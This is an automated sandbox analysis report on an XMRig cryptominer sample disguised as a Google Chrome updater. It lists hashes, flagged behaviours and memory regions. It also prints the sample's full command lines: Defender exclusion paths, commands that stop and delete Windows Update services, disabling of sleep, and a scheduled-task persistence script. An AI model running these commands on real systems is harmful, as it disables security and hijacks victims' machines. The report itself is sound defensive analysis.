Analysis

  • max time kernel
    1802s
  • max time network
    1816s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2023 17:31

General

  • Target

    NL/miDDner.exe

  • Size

    53.0MB

  • MD5

    5c4eecf00e9f6e0222c205c3dc327bb8

  • SHA1

    2188e4b277e214364804a4ffcef23017a769722f

  • SHA256

    2fa065de1468413ea4f909f527e4b7d03bca047c5d4adf1dfa7ade9155ad84e3

  • SHA512

    0b1761d562484cf54a43599e84836b595dc948f86ecc438ef9bfcb9a30d40e0e51046ff4e3a1d30516971fe92ccb233d0f06613ff17695f9075185effc77db39

  • SSDEEP

    786432:rZxRmsqYJysNiakCKIqHMzvX67SvdZiF4QI7rR8pUvlQ6Pb:dqYJysNiakCKJHMzvX6ofQAKpUdQ6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 32 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 32 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3200
      • C:\Users\Admin\AppData\Local\Temp\NL\miDDner.exe
        "C:\Users\Admin\AppData\Local\Temp\NL\miDDner.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2076
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3780
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:228
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1044
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:3032
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:1612
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3900
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:2748
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:1188
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:1580
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:3268
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:1936
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hpfjuzary#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4972
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3828
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-ac 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2232
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-dc 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:652
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-ac 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3964
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jcugcwsbl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3812
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:3768
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:876
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4572
                  • C:\Windows\System32\sc.exe
                    sc stop UsoSvc
                    3⤵
                    • Launches sc.exe
                    PID:1320
                  • C:\Windows\System32\sc.exe
                    sc stop WaaSMedicSvc
                    3⤵
                    • Launches sc.exe
                    PID:3136
                  • C:\Windows\System32\sc.exe
                    sc stop wuauserv
                    3⤵
                    • Launches sc.exe
                    PID:5056
                  • C:\Windows\System32\sc.exe
                    sc stop bits
                    3⤵
                    • Launches sc.exe
                    PID:372
                  • C:\Windows\System32\sc.exe
                    sc stop dosvc
                    3⤵
                    • Launches sc.exe
                    PID:3804
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    3⤵
                      PID:4400
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      3⤵
                        PID:2952
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        3⤵
                          PID:2640
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                          3⤵
                            PID:3388
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                            3⤵
                              PID:2220
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4668
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                                PID:1920
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -hibernate-timeout-dc 0
                                3⤵
                                  PID:1264
                                • C:\Windows\System32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  3⤵
                                    PID:5052
                                  • C:\Windows\System32\powercfg.exe
                                    powercfg /x -standby-timeout-dc 0
                                    3⤵
                                      PID:564
                                  • C:\Windows\System32\conhost.exe
                                    C:\Windows\System32\conhost.exe etzzkakmg
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5016
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      3⤵
                                      • Drops file in Program Files directory
                                      PID:640
                                  • C:\Windows\System32\cmd.exe
                                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                    2⤵
                                    • Drops file in Program Files directory
                                    • Suspicious use of WriteProcessMemory
                                    PID:4396
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                      3⤵
                                        PID:3144
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe ztzptsnoedioejdw 9iglejqod3hFFxVhkr+WUaol7tpsq+sx3xs4hsVXOg+m/MQNrGWjJxY7q+IriA/on0Hr8KA98LUOT5htKhbexvQM3CPn32BhsKxg1njCTOhUeztmqm8Mu/ZFhejkqTEpJHxOXGbz6fkYGFdYncO7npPPBS03OOiqaTGas+PgMCqGPbreQed32DvfYpa0SQ2FJR9dTs7giUOVM3pXJtMKLvbAgrjXk3uGyZ0rmkqINAQ=
                                      2⤵
                                        PID:3284
                                    • C:\Program Files\Google\Chrome\updater.exe
                                      "C:\Program Files\Google\Chrome\updater.exe"
                                      1⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of WriteProcessMemory
                                      PID:4600
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hpfjuzary#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                        2⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4632

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Program Files\Google\Chrome\updater.exe

                                      Filesize

                                      53.0MB

                                      MD5

                                      5c4eecf00e9f6e0222c205c3dc327bb8

                                      SHA1

                                      2188e4b277e214364804a4ffcef23017a769722f

                                      SHA256

                                      2fa065de1468413ea4f909f527e4b7d03bca047c5d4adf1dfa7ade9155ad84e3

                                      SHA512

                                      0b1761d562484cf54a43599e84836b595dc948f86ecc438ef9bfcb9a30d40e0e51046ff4e3a1d30516971fe92ccb233d0f06613ff17695f9075185effc77db39

                                    • C:\Program Files\Google\Chrome\updater.exe

                                      Filesize

                                      53.0MB

                                      MD5

                                      5c4eecf00e9f6e0222c205c3dc327bb8

                                      SHA1

                                      2188e4b277e214364804a4ffcef23017a769722f

                                      SHA256

                                      2fa065de1468413ea4f909f527e4b7d03bca047c5d4adf1dfa7ade9155ad84e3

                                      SHA512

                                      0b1761d562484cf54a43599e84836b595dc948f86ecc438ef9bfcb9a30d40e0e51046ff4e3a1d30516971fe92ccb233d0f06613ff17695f9075185effc77db39

                                    • C:\Program Files\Google\Libs\g.log

                                      Filesize

                                      226B

                                      MD5

                                      fdba80d4081c28c65e32fff246dc46cb

                                      SHA1

                                      74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                      SHA256

                                      b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                      SHA512

                                      b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      3a6bad9528f8e23fb5c77fbd81fa28e8

                                      SHA1

                                      f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                      SHA256

                                      986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                      SHA512

                                      846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      a16b84830c7c18df54f25c15d0f81951

                                      SHA1

                                      9d817fc72fbaf76175e677dec66002e9bdff6da0

                                      SHA256

                                      0d7a62ab7c299a90db4e2ec1a6c4b10e7bf17879f699f042728e7f4870c69a53

                                      SHA512

                                      98b62f81111e958787db2137649d7ae1769ae142dce1d824a8093283fac50846f59e0b1e1cfe26ed07322bee1c8ddad2bc1b18a0d69ecaa1f79c7a9bc26300b6

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plbd5d1u.za3.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      4KB

                                      MD5

                                      bdb25c22d14ec917e30faf353826c5de

                                      SHA1

                                      6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                      SHA256

                                      e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                      SHA512

                                      b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      b42c70c1dbf0d1d477ec86902db9e986

                                      SHA1

                                      1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                      SHA256

                                      8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                      SHA512

                                      57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                    • memory/876-209-0x000002AAE93E0000-0x000002AAE93EA000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/876-205-0x000002AAE9390000-0x000002AAE939A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/876-208-0x000002AAE93D0000-0x000002AAE93D6000-memory.dmp

                                      Filesize

                                      24KB

                                    • memory/876-207-0x000002AAE93A0000-0x000002AAE93A8000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/876-206-0x000002AAE93F0000-0x000002AAE940A000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/876-190-0x000002AACF120000-0x000002AACF130000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/876-191-0x000002AACF120000-0x000002AACF130000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/876-192-0x00007FF43F9E0000-0x00007FF43F9F0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/876-202-0x000002AAE9170000-0x000002AAE918C000-memory.dmp

                                      Filesize

                                      112KB

                                    • memory/876-203-0x000002AAE8F60000-0x000002AAE8F6A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/876-204-0x000002AAE93B0000-0x000002AAE93CC000-memory.dmp

                                      Filesize

                                      112KB

                                    • memory/2076-165-0x00007FF77A480000-0x00007FF77D988000-memory.dmp

                                      Filesize

                                      53.0MB

                                    • memory/3284-247-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-285-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-313-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-311-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-309-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-307-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-305-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-303-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-301-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-299-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-297-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-295-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-293-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-291-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-289-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-246-0x000001FF31BE0000-0x000001FF31C00000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/3284-287-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-283-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-281-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-279-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-277-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-249-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-250-0x000001FF32600000-0x000001FF32640000-memory.dmp

                                      Filesize

                                      256KB

                                    • memory/3284-251-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-275-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-253-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-255-0x000001FF32640000-0x000001FF32660000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/3284-256-0x000001FF32660000-0x000001FF32680000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/3284-257-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-259-0x000001FF32640000-0x000001FF32660000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/3284-260-0x000001FF32660000-0x000001FF32680000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/3284-261-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-263-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-265-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-267-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-269-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-271-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3284-273-0x00007FF760850000-0x00007FF761044000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/3780-144-0x0000028BFF170000-0x0000028BFF180000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3780-145-0x0000028BFF170000-0x0000028BFF180000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3780-133-0x0000028BFF0F0000-0x0000028BFF112000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3780-143-0x0000028BFF170000-0x0000028BFF180000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3812-176-0x000002334F640000-0x000002334F650000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3812-177-0x000002334F640000-0x000002334F650000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3812-178-0x000002334F640000-0x000002334F650000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4600-245-0x00007FF640620000-0x00007FF643B28000-memory.dmp

                                      Filesize

                                      53.0MB

                                    • memory/4600-241-0x00007FF640620000-0x00007FF643B28000-memory.dmp

                                      Filesize

                                      53.0MB

                                    • memory/4632-237-0x00000208B64D9000-0x00000208B64DF000-memory.dmp

                                      Filesize

                                      24KB

                                    • memory/4632-235-0x00007FF4CB780000-0x00007FF4CB790000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4632-234-0x00000208B64D0000-0x00000208B64E0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4632-219-0x00000208B64D0000-0x00000208B64E0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4632-218-0x00000208B64D0000-0x00000208B64E0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4972-161-0x000001D134290000-0x000001D1342A0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4972-160-0x000001D134290000-0x000001D1342A0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4972-159-0x000001D134290000-0x000001D1342A0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4972-162-0x000001D134290000-0x000001D1342A0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/5016-252-0x00007FF6ABD00000-0x00007FF6ABD16000-memory.dmp

                                      Filesize

                                      88KB

                                    • memory/5016-248-0x00007FF6ABD00000-0x00007FF6ABD16000-memory.dmp

                                      Filesize

                                      88KB